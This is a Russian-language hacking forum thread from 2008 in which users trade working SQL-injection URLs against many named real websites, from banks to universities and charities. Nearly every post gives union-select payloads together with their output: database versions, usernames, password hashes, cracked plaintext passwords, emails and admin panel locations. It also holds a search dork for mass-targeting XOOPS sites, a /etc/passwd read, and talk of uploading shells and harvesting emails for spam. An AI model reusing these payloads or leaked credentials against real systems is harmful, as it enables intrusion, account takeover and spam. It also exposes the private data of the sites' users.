http://moblog.co.uk/rss.php?id=-11206+union+select+1,2,concat_ws(0x3a3a,userlevel, username,password,email),4,5+from+mob_users/*

Скрипт блога тоже бажный...

ElteRUS

03.01.2008, 17:31

http://www.rabota-enisey.ru/news/?article=-1+or+1=@@version--

'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '

http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+db_name())-- rabota-enisey.ru
http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+system_user)-- rabota-enisey_ru

-----------------------------------------------------------------------------

invest.trust.ru Инвестиционный банк «ТРАСТ»

http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*

5.0.22/trust_rus/trust_bank@localhost

http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,users_login,users_ password,users_Email),3,4,5,6,7,8,9+from+site_user s+limit+0,1/*

логин/хеш/мейл
root/e6b764d1ce8aec819b8aeebb2c4f45db/

Юзаем ANTICHAT ONLINE MD5 CRACK (http://md5.xek.cc/ ) получаем:

e6b764d1ce8aec819b8aeebb2c4f45db - rjgtqrf76

:)

SWAT

03.01.2008, 17:53

http://www.ptgem.pl/pokaz.php?idz=-9+union+select+1,2,3,VERSION(),5,6,7/*

http://www.foto-akcesoria.com.pl/index.php?i=produkt&nr=-9+union+select+VERSION(),2,3/*

http://www.emmanuel.home.pl/index.php?lang=uk&url2=art&info=-999+union+select+1,2,3,version(),5,6,7/*

~EviL~

03.01.2008, 19:17

www.slavishow.com

http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(version(),0x3a,user() ,0x3a,database()),3,4+LIMIT+170,2/*
5.0.32-Debian_7etch3-log:web_user@localhost:slavishow_web

http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(id,0x3a,name,0x3a,pas s),3,4+FROM+slavishow_web.admins+LIMIT+170,4/*
1:tester:09dc76b84e834f94643dde29695d28ec
2:dani:b5284b4b124260044f1a640fd6494b3f
3:joro:e10adc3949ba59abbe56e057f20f883e::123456

http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(user_id,0x3a,username ,0x3a,user_password),3,4+FROM+db_Forum.tb_users+LI MIT+170,50/*
2:Aleko:f02123067c08a29eb91a894af3493bc8
3:darco:d8578edf8458ce06fbc5bb76a58c5ca4::qwerty (админ) http://forum.slavishow.com/login.php
...

http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(login,0x3a,password,0 x3a,e_mail,0x3a,realname),3,4+FROM+db_Forum.chat_u sers+LIMIT+170,50/*
chat_admin:wiesteludi:0: (админ) http://chat.slavishow.com/
.SLAVI.:1:BUNNY_BULL@YAHOO.COM:SLAVI
...

sharoff

03.01.2008, 21:29

invest.trust.ru Инвестиционный банк «ТРАСТ»

...

e6b764d1ce8aec819b8aeebb2c4f45db - rjgtqrf76

:)

админка
http://www.invest.trust.ru/_admin/

Шелл залить не удалось, кому удастся напишите в асю.

ILYAtirtir

03.01.2008, 23:31

http://www.savage.ru/news.php?target=news&id=-1'+union+select+aes_decrypt(aes_encrypt(user(),0x7 1),0x71),2/*
Одежда от Savage Ксения Собчак итд xD

http://www.rasytojai.lt/writers.php?sritis=jaunieji&jaunieji=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36/*
Единственное нарыл в users Marius:faktorius админку не нашёл

http://www.muzikosfaktorius.lt/inner.php?krep=0&tree=0&kat=SUB&class=INS&lnk=-1+union+select+1,concat_ws(0x3a,name,password),3+f rom+users+limit+1,1/*

http://www.starcade.com.ph/inner.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28/*&selection=80

http://www.dm-centre.ru/inner.php?page=news1&id=-1+union+select+version(),2,3/*

http://www.dm-centre.ru/inner.php?page=news1&id=-1+union+select+concat_ws(0x3a,name,password),2,3+f rom+fast_admin/*
admin:rfnz(админка(http://www.dm-centre.ru/admin.php))
http://www.dm-centre.ru/inner.php?page=news1&id=-1+union+select+concat_ws(0x3a,username,user_passwo rd),2,3+from+phpbb_users/*
ADMINer:9183f254e874a7ae034e68fd9f2053e1(фору� �)

Ded MustD!e

03.01.2008, 23:36

http://www.audiofoundation.org.nz/

Все базы расковырял, где пароли лежат)

http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,login ,pass,mail,name),3,4,5,6,7,8,9,10,11,12,13,14+from +audiofoundation_new.users+limit+1,1/*

http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,login ,pass,mail),3,4,5,6,7,8,9,10,11,12,13,14+from+drup al.users+limit+1,1/*

http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai l,password),3,4,5,6,7,8,9,10,11,12,13,14+from+audi ofoundation.artistdb+limit+0,1/*

http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai l,password,name),3,4,5,6,7,8,9,10,11,12,13,14+from +history_forum.LUM_User+limit+0,1/*

http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,emai l,password,name),3,4,5,6,7,8,9,10,11,12,13,14+from +afhp_forum.LUM_User+limit+0,1/*

http://www.audiofoundation.org.nz/artist_page.php?id=-1+union+select+1,concat_ws(0x3a,mail, password),3,4,5,6,7,8,9,10,11,12,13,14+from+loudbl og.lb_authors+limit+0,1/*

159932

03.01.2008, 23:49

www.rabota-tula.info
www.rabota-nsk.info
www.rabota-samara.info
www.rabota-rostov.info
www.rabota-kazan.info
www.rabota-voronezh.info
www.rabota-ekaterinburg.info
www.rabota-orenburg.info
www.rabota-nn.info
www.rabota-yugra.info
www.rabota-murmansk.info
www.rabota-krasnoyarsk.info
www.rabota-bryansk.info
www.rabota-perm.info
www.rabota-tyumen.info
www.rabota-khabarovsk.info
www.rabota-chelyabinsk.info
www.rabota-kostroma.info
www.rabota-lipetsk.info
www.rabota-stavropol.info
www.rabota-ufa.info
www.rabota-yaroslavl.info
www.rabota-belgorod.info
www.rabota-tver.info
www.rabota-penza.info
www.rabota-ryazan.info
www.rabota-spb.info
www.rabota-krasnodar.info
www.rabota-volgograd.info
www.rabota-irk.info
www.rabota-chita.info
www.rabota-kursk.info
www.rabota-norilsk.info
www.rabota-orel.info
www.rabota-tambov.info
www.rabota-ulyanovsk.info
www.rabota-pskov.info
www.rabota-omsk.info
www.rabota-kaluga.info
www.rabota-izhevsk.info
www.rabota-kirov.info
www.rabota-nsb.info
www.rabota-smolensk.info
www.rabota-saratov.info
в любые подставить /linkres.php?link=-41+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,concat(ID,0x3a,pass)+f rom+adminip/*
http://любой_из_этих_сайтов/admin.php
везде пасс 1q2w3e4r5t

~EviL~

04.01.2008, 02:34

www.cetim.ch

http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(version( ),0x3a,user(),0x3a,database()),11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25/*
5.0.45-log:cetimweb@imu129.infomaniak.ch:cetimch

http://www.cetim.ch/fr/publications_details.php?pid=-115+UNION+SELECT+1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd'),11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25/*

04.01.2008, 03:16

search.icq.com
inurl:"/modules/articles/article.php?id" site:.ru
Сама уязвимость :
/modules/articles/article.php?id=-1%20union%20select%20null,null,null,null,concat(0x 4847,uname,0x4847),null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null%20from %20xoops_users%20where%20uid%20like%201/*
Результат за 5 минут:

www.mosapteki.ru
Alesta:5cda66bc6dcaa02a447c95c8fa4a1ec9
===
www.vet.ru
spacedefender:ab334feeb31c05124cb73fa12571c2f6:cap tain
===
skazki-o-sile.ru
admin:0a8a413d9bc599c8e1de5fda8aa6eb02
===
www.npnh.ru
npnh:a942f5f0961d0154b26e41db069cde6b
===
www.usinsknet.ru
admin:fe01d67a002dfa0f3ac084298142eccd:orange
===
www.liveinstyle.ru
admin:ae2b1fca515949e5d54fb22b8ed95575:testing
===
www.7435588.ru
Admin:246edc51f5bbea6acb7b456d4b4a6a7a:yupopa
===
www.fut-bol.ru
9389ff7e426048ed1ca3aa6b9b341a1d
===
http://www.manhattan-receivers.com
Administrator:8b1910f8606a57e795e0f39f8bcd0d24:cka ljotia
===
http://www.ua-china.com
admin:42bb650a9dfb3927c79ffaaae1e1abce:simfo
===
http://www.nauticapress.com
admin:9ae5bdc58f37d3b242a8c077a5d500f5:orvalho
===

_http://www.mpg56.net.ru:87ad26bdd13a98eba5adc067f7489184:
_http://www.realityshack.com:8d64f5fc381830c84ef2608ae872e 636:
_http://susuibu.com:aceaf61c55193f09b6ad3740a0af461a:
_http://belacanempire.com:78e4c39c2d80d9bc409b3531ffc520e0 :
_http://www.somosportugueses.com:fed3dc930e6338c7e95aed6f7 3270c9d:
_http://www.portaldojardim.com:d9bd10bc5ba016bc23cc1838f84 a9963:
_http://oraintl.org:180a5ed5ffcc996f034761d1b4e07a46:
_http://www.balochwarna.org:9e2787d67d6d2ae6874dc34b560207 13:
_http://www.indianoss.org:7cc3a89a8350a9a0f1b700ffd0588923 :
_http://www.vegetotherapy.org:dc8e9522878a72629f3f105f8d4a 5337:
_http://medicina.netsons.org:9c91b72b927e2c1efba40e618252d aa0:02091985
_http://www.ppjaponesia.org:ad77e88cbceb4da8569954083ee08b f7:
_http://empresascomprometidas.org:84ad41ed319c425a41f430d0 11b4cc99:
_http://milelvenihal.org:a5741dff02511e41abec0e3c5a1cf289:

.Slip

04.01.2008, 03:18

search.icq.com

Сама уязвимость :

Результат за 5 минут:

www.mosapteki.ru
Alesta:5cda66bc6dcaa02a447c95c8fa4a1ec9
===
www.vet.ru
spacedefender:ab334feeb31c05124cb73fa12571c2f6:cap tain
===
skazki-o-sile.ru
admin:0a8a413d9bc599c8e1de5fda8aa6eb02
===
www.npnh.ru
npnh:a942f5f0961d0154b26e41db069cde6b
===
www.usinsknet.ru
admin:fe01d67a002dfa0f3ac084298142eccd:orange
===
www.liveinstyle.ru
admin:ae2b1fca515949e5d54fb22b8ed95575:testing
===
www.7435588.ru
Admin:246edc51f5bbea6acb7b456d4b4a6a7a:yupopa
===
www.fut-bol.ru
9389ff7e426048ed1ca3aa6b9b341a1d
===
http://www.manhattan-receivers.com
Administrator:8b1910f8606a57e795e0f39f8bcd0d24:cka ljotia
===
http://www.ua-china.com
admin:42bb650a9dfb3927c79ffaaae1e1abce:simfo
===
http://www.nauticapress.com
admin:9ae5bdc58f37d3b242a8c077a5d500f5:orvalho
===
Это боян. Под xoops уже кто то сплойт писал, под именно такую багу:\

Scipio

04.01.2008, 03:23

вы что реально думаете что icq.com на мускуле работает? там сибэйз асе последней ветки
и вобще там права mbread вобщем бесполезно, и нечего мучаться

~EviL~

04.01.2008, 04:24

www.awdf.org

http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(version(),0x3a,user(),0x3a, database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7/*
5.0.22:robin@localhost:dbawdf3

http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+count(table_name),2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+FROM+information_schema.ta bles/*
В ответ я получил 1906, но проверив, таблиц оказалось меньше 100 =)

http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,p assword,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+FROM+adminusers+LIMIT+0,1/*
1:test:test:robin@test.com
2:vera:test:vear@awdf.org
(http://www.awdf.org/admin/index.php)

http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,p assword),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+F ROM+dbacademicafrica.aa_user+LIMIT+5,1/*
11:admin:AA6tQYSfGxd/A

http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(memberid,0x3a,email,0x3a,pa ssword),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FR OM+dbacademicafrica.aa_member+LIMIT+650,1/*
655:gyenfi@yahoo.com:johnog

Ded MustD!e

04.01.2008, 04:25

http://www.72dpi.co.nz/

http://www.72dpi.co.nz/packages/index.php?pid=-1+union+select+1,convert(concat_ws(0x3a,us er(),database(),version())+using+latin1),3,4/*

~EviL~

04.01.2008, 14:10

http://policies.lakeheadu.ca

http://policies.lakeheadu.ca/policy.php?pid=-178+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,concat_ws(0x3a,version(),user(),database( )),19/*
4.1.21-standard-log:admini@localhost:administration

А®ТеS

04.01.2008, 16:27

MsSQL injection:
http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+db_name())--
www.aiim.org - Google PR 7 :).

А®ТеS

04.01.2008, 23:44

http://webcast.streamx.com.au/?id=1'+or+1=(SELECT+db_name())--

Ded MustD!e

05.01.2008, 01:05

http://www.botellaalmar.com.ar/

http://www.botellaalmar.com.ar/detalle_nota.php?Id=10002&tipo=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())/*

ThreeD

05.01.2008, 01:59

www.7courier.com

http://www.7courier.com/shopping.php?id=-37+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7/*

4.1.22-standard:thetphyo_7courier:thetphyo_7c@localhost

www.belledune.com

http://www.belledune.com/shopping.php?id=-11+union+select+1,2,convert(concat(version(),0x3a, database(),0x3a,user())+using+latin1),4,5,6,7,8,9, 10,11,12,13/*

5.0.18-nt :belledunedb: belleduneUSER@localhost

www.visitrandolphcounty.com

http://www.visitrandolphcounty.com/shopping.php?id=-11+union+select+1,2,concat(version(),0x3a,database (),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.20: visitrandolph: visitran@localhost

scrat

05.01.2008, 03:09

http://new.prikolnoe.tv
http://new.prikolnoe.tv/?show=1&c_id=12&id_movie=275%60
http://new.prikolnoe.tv/?show=1&c_id=12%60&id_movie=275
чёто не оч. получается она у меня :mad:

halkfild

05.01.2008, 05:19

предистория)) нужно было найти траф.. ну а траф у нас где?) правильно еротика и тд :D
поиск мне помог

нашли сайт

http://svalka.biz/go.php?go=Download&id=17985/*
http://svalka.biz/go.php?go=Download&id=17985+order+by+6/*

6 полей

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3a3a,version() ,user(),database()),3,4,5,6/*

#5.0.22-log::glamur_svalka@localhost::glamur_svalka
5-тая версия - тянем всю инфу

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3a3a,version() ,user(),database()),3,4,5,6+fromusers/*

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,TABLE_SCH EMA,TABLE_NAME),3,4,5,6+from+information_schema.ta bles/*
таблици /*жалко видно таблици только этого хоста*/

glamur_svalka::admin
glamur_svalka::comments
glamur_svalka::downloads
glamur_svalka::fail_logs
glamur_svalka::iplogg
glamur_svalka::linker
glamur_svalka::main_logs
glamur_svalka::que
glamur_svalka::site_downloads
glamur_svalka::succes_logs

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,TABLE_SCH EMA,TABLE_NAME,column_name),3,4,5,6+from+informati on_schema.columns/* ну и сами поля /*выбраны сами интересные таблы*/
glamur_svalka::succes_logs::time
glamur_svalka::succes_logs::date
glamur_svalka::succes_logs::ref
glamur_svalka::succes_logs::agent
glamur_svalka::succes_logs::hostname
glamur_svalka::succes_logs::ip
glamur_svalka::succes_logs::password
glamur_svalka::succes_logs::username
glamur_svalka::succes_logs::id

glamur_svalka::fail_logs::time
glamur_svalka::fail_logs::date
glamur_svalka::fail_logs::ref
glamur_svalka::fail_logs::agent
glamur_svalka::fail_logs::hostname
glamur_svalka::fail_logs::ip
glamur_svalka::fail_logs::password
glamur_svalka::fail_logs::username
glamur_svalka::fail_logs::id

glamur_svalka::admin::id
glamur_svalka::admin::username
glamur_svalka::admin::password
glamur_svalka::admin::email
glamur_svalka::admin::level

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,id,userna me,password,email,level),3,4,5,6+from+glamur_svalk a.admin/*
достаем данные пользователей

1::admin::admin::webmaster@kindstot.org::1

мдям.. тяжелый пасс =\ теперь админка.. по стандартным местам ее нет.. смотрим в логах /*нестандартный ход)))*/

http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ws(0x3A3a,ip,userna me,password,ref,hostname),3,4,5,6+from+glamur_sval ka.succes_logs/*
и мне выдало адресс админки))

http://svalka.biz/admin/admincp.php?action=login или подругому

з.ы. в админке нет ничего особо интересного =\
з.з.ы. шел не залил =\

je0n

05.01.2008, 08:21

журнал ironman
таблицы, где встречается колонки похожие на "pass"
http://www.ironman.ru/php/news.php3?id=-1123+union+select+1,2,3,table_name,5,6,7,8+from+in formation_schema.columns+where+column_name+like+ch ar(37,112,97,115,115,37)+limit+0,1/*
имеется таблица - account - это от форума. форум кончелыжный, через него замутить ничего нельзя.
http://forum.ironman.ru
Admin:67423383
далее нашлась таблица curent_user - хер пойми что это. там одна запись всего - login:password
sportservice:470db2cf7130166ae97c78885413fdbd
расшифровал - c6h5cooh

есть админка:
http://ironman.ru/php/admin/
нихрена туда логины и пароли из форума и расшифрованные не катят (БЛ*ТЬ!!!)

есть вебмайл:
http://ironman.ru/webmail/
и phpmyadmin:
http://ironman.ru/myadmin/
добытые пароли, ествественно, никуда не подходят. доступ к таблице mysql.user - закрыт. что еще замутить я больше не знаю!

P.S. из базы имэйлов на форуме можно сделать спам-базу для рассылки рекламы виагры. Думаю, отдача будем ошелмляющей :) (на форуме качки обсуждают стеройды)

RaDDeaD

05.01.2008, 08:44

http://www.centrgroup.ru/nn.php?id=-%201+union+select+1,2,3,4,5,concat(id,0x20,user_na me,0x3a,user_pass),7+from+users+where+id=0/*

Тока вот до админки не дорылся... :(

RaDDeaD

05.01.2008, 08:50

http://www.tni.mil.id/patriotweb/?action=PesanSaran&ed=-1+union+select+0,1,concat(username,0x3a,password,0 x3a,email)+from+user/*
:D

Tigger

05.01.2008, 13:33

http://www.ipz.ru/alltop.php?cat=-1+union+select+version()/*
Версия: 5.0.41-community

http://www.ipz.ru/alltop.php?cat=-1+union+select+concat(login,char(58),password,char (58),email)+from+users+limit+0,1/*

Там 1499 юзеров....Можно через Limit

AkyHa_MaTaTa

05.01.2008, 15:16

вот поклоникам линейки:

http://info.l2r.ru/?part=items&id=@@version--
http://info.l2r.ru/?part=items&id=(select+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES)--

Shram-spb

05.01.2008, 18:52

http://www.chemistry.gatech.edu/events/special/index.php?sID=-3+union+select+1,2,3,4,5,concat_ws(char(58),userna me,pw),7,8,9,10,11,12,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,33+from+user_logins/*

ElteRUS

05.01.2008, 19:39

http://www.olimpauto.ru/mercedes/index.php?ob=news_one_olimp&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*

4.1.22/wwwolimpautoru/olimpaut@localhost
-----------------------------------------------------------------------------

http://www.almatyfilmfestival.kz/index.php?mod=news&nid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10/*

4.1.22/affbase/affbase@localhost
-----------------------------------------------------------------------------

http://mosgroup-realty.ru/articles/all?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*

4.1.22-standard-log/mosgrou_db01/mosgrou_user0710@localhost
-----------------------------------------------------------------------------

historicalcenter.ru

http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws(0x2F,version(),database( ),user()),2/*

5.0.44-log/histcenter/histcenter@localhost

http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws(0x2F,login,passwd,email) ,2+from+users+limit+0,1/*

логин/пароль/мейл
ss/ss/serge@uzh.ru

159932

05.01.2008, 19:42

http://www.oceansurf.ca/events.php?id=-8+union+select+1,2/*
4.1.20
-------------------------------------
http://www.rogerselectric.ca/projects.php?cid=-4+union+select+1,2,3,4,5,6,7/*
4.1.20
--------------------------------------
http://www.oakislandproductions.com/products.php?pid=-52+union+select+1,2,3,4,5,6,7,8,9,0/*
4.1.20
--------------------------------------
http://www.motelcleospa.com/treatments.php?cat=-1+union+select+1,2,3/*&lang=0
4.1.20
--------------------------------------
http://www.gowanbraegolf.nb.ca/news.php?id=-47+union+select+1,2,3,4,5/*
4.1.20

159932

05.01.2008, 21:19

П А Д А Р К А !!!
www.gtanf.com
5.0.32-Debian_7etch3-log
юзеры ~ 5к
http://www.gtanf.com/forums/index.php?act=members
http://www.sanandreas-fr.net/?page=article&id=-4947+union+select+1,members_l_username,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+ibf_ members+limit+0,1/*
http://www.sanandreas-fr.net/?page=article&id=-4947+union+select+1,members_l_username,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+ibf_ members+limit+0,1/*
ищем админов брутим пасс и лезем в админку
на форуме 4 админа

А®ТеS

05.01.2008, 21:23

.AU
PR довольно высокий.

http://www.onlymelbourne.com.au/melbourne_details.php?id=-1+UNION+SELECT+1,2,3,VERSION(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49/*

http://www.ruraldoc.com.au/content_sub.php?id=-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(VERSION (),0x71),0x71),4,5,6/*

http://www.gertrude.org.au/exhibition.php?id=-1+UNION+SELECT+1,2,3,VERSION(),5,6,7,8,9,10/*

http://www.ecoaction.com.au/content.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(username,';',password),0x71),0x71),5,6,7,8,9,10, 11+FROM+users/*

Ded MustD!e

05.01.2008, 21:42

http://et.igwane.be/ Фан-сайт по игре Wolfenstein, наковырял у них 3 базы, в них 4 таблы с юзерами)

http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7,8,9,10,11+from+igwane_be_5.logs+limit+0,1/*

admin:exuifoLgJGROk

http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7,8,9,10,11+from+igwane_be_3.eck_user+limit+ 0,1/*

http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7,8,9,10,11+from+igwane_be_5.members+limit+0 ,1/*

http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8,9,10,11+from+igwane_be_1.et_users+lim it+0,1/*

.Begemot.

05.01.2008, 22:41

isparis.edu

http://www.isparis.edu/page.php?id=-18+union+select+0,1,convert(concat(USER(),0x3a,VER SION(),0x3a,DATABASE())+using+latin1),3,4,5,6,7,8/*'

USER:root@localhost
VERSION:4.1.10-nt
DATABASE:isp

http://www.isparis.edu/page.php?id=-18+union+select+0,1,convert(concat(user,0x3a,passw ord)+using+latin1),3,4,5,6,7,8+from+mysql.user/*

Таблица - mysql.user
Поля - user,password

root:5b3b151c66ce83e2

NOmeR1

05.01.2008, 23:08

http://www.bedehusweb.no/b/show_event.php?eid=273+union+select+1,2,3,4,concat _ws(0x3C62723E,USER(),DATABASE(),VERSION()),6,7,8, 9/*
http://www.lykkensportal.no/visartikkel.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3C62723E,USER(),DATABASE(),VERSION()),13,14,15,16/*
=(

Ded MustD!e

05.01.2008, 23:39

http://www.lesmuseesenwallonie.be/

http://www.lesmuseesenwallonie.be/html/musee.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25/*

http://itext.ugent.be/

http://itext.ugent.be/library/question.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7/*

http://www.toerismehageland.be/

http://www.toerismehageland.be/gemeente.php?id=-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7,8,9,10,11,12/*

159932

05.01.2008, 23:58

http://www.gtanf.com/?page=article&id=-4853+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8/*
5.0.32-Debian_7etch3-log
там ipb форум ...

159932

06.01.2008, 00:06

http://www.terradigm.org/services.php?id=-17+union+select+1,2,3/*
4.1.20
--------------------------------------
http://www.industrialrubberco.com/industries.php?id=-3+union+select+1,2,3,4,5/*
4.1.20
--------------------------------------
http://www.cbdc.ca/news.php?id=-45+union+select+1,2,3,4,5,6,7/*&rid=1
4.1.20
--------------------------------------
http://www.websolutions.ca/technologies.php?id=-1+union+select+1,2,3,4,5,6/*
4.1.20
--------------------------------------
http://www.waymarknetwork.ca/services.php?cid=4&id=-16+union+select+1,2,3/*
4.1.20
--------------------------------------
http://www.maritimewelding.com/products.php?id=-3+union+select+1,2,3,4,5,6/*
4.1.20
--------------------------------------
http://www.syndicatforestier.com/news.php?id=-10+union+select+1,2,3,4,5/*
4.1.20
--------------------------------------
http://www.waymarknetwork.ca/services.php?cid=3&id=-14+union+select+1,2,3/*
4.1.20
--------------------------------------
http://www.insurance-assurance.ca/news.php?id=-11+union+select+1,2,3,4,5,6/*
4.1.20
--------------------------------------
http://www.wbnb-fanb.ca/stories.php?id=-2+union+select+1,2,3,4,5/*&lang=1

SWAT

06.01.2008, 01:33

http://www.oxfam.org.nz/news.asp?aid=1050+or+1=@@version--

K1nD[e]R

06.01.2008, 02:24

http://fs.lan.utech.ru/index.php?p=films&pp=txt&genre=all&ru=&en=&sort_by=time&sort_order=desc&action=view&id=99999+union+select+1,2,3,4,5,0x6964,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20+from+utech_build.relCo mmonBaseOrder_Material/*

Ded MustD!e

06.01.2008, 02:42

http://www.kras.be/

http://www.kras.be/ECMS_CLIENT_KRAS/configuration/pages/showalltours.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7,8,9,10/*

Ded MustD!e

06.01.2008, 02:44

http://www.arnaques.be/

http://www.arnaques.be/page.php?ID=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6+from+mysql.user/*&crioc=O

root:696efd2f4c232e84

http://www.vrijwilligerswerk.be/

http://www.vrijwilligerswerk.be/nieuws/nieuws.php?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,passw ord)+from+user/*

http://www.jeugdrodekruis.be/

http://www.jeugdrodekruis.be/index.php?ID=-1+union+select+1,concat_ws(char(58),user(),version (),database()),3/*

А®ТеS

06.01.2008, 03:28

.AU
MsSQL
Google PR 5

http://www.unisport.com.au/extra.asp?id=1+or+1=(SELECT+db_name())--

Google PR 4

http://www.moyes.com.au/productdetail.asp?ID=1+or+1=(SELECT+db_name()))--

ZAMUT

06.01.2008, 03:39

www.rollingstonemagazine.it
http://www.rollingstonemagazine.it/page.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11/*5.0.32-Debian_7etch3-log:rs_magazine@localhost:db_rs_magazine

www.cinemadelsilenzio.it
http://www.cinemadelsilenzio.it/index.php?mod=film&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/*5.0.22:WA_011920@localhost:cinemadelsilenzioit418

www.rock.cs.unitn.it
http://rock.cs.unitn.it/dett_abstract.php?id=000-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws (0x3a,version(),user(),database()),0x71),0x71),3/*4.1.11:macrina@localhost:rock

159932

06.01.2008, 03:40

www.punk.org.ua
4.1.12
http://www.punk.org.ua/users/detail.php?id=-8312+union+select+1,convert(concat_ws(0x3a,login,p assword,icq),binary),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3+from+users/*
root:2be43f140bb11412
referator:42587299301a11ad
yack:077c36bc25937347:wattie
punk:542fb5ca46bfbca2
http://www.punk.org.ua/users/detail.php?id=-8312+union+select+1,convert(concat_ws(0x3a,login,p assword,icq),binary),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3+from+users/*

Ded MustD!e

06.01.2008, 04:14

http://www.eric-maerschalck.be/

http://www.eric-maerschalck.be/Bruxelles/themes_group.php?id=-1'+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10/*

http://www.biteback.be/

http://www.biteback.be/goveg/ov_detail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3/*

ILYAtirtir

06.01.2008, 04:20

http://techgaz.ru/
http://techgaz.ru/product.php?id=-1+union+select+concat_ws(0x3a,login,password,versi on()),2,3,4+from+utg_admin/*
